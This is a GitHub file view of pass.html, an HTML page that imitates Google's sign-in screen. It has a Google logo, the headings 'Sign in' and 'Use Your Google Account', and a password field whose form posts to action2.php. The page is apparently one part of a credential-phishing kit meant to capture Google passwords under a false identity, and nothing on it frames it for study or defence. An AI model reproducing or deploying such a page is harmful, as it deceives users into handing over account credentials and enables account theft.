-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpass.html
27 lines (26 loc) · 887 Bytes
/
pass.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="maindiv">
<img src="google.png" alt="Google">
<h1>Sign in</h1>
<h3>Use Your Google Account</h3>
<div class="inputs">
<form class="Fields" action= "action2.php" method= "post">
<div class="Fieldset">
<input type="password" class="Before-FS" name= "psw" required >
<h1 class="Fs-H"><span>Password</span></h1>
<label class="placeholder">Password</label>
<h4>Not your computer? Use a private browsing<br>window to sign in.</h4><br><br>
</div>
</div>
<button type= "submit">Sign In</button>
</form>
</div>
</body>
</html>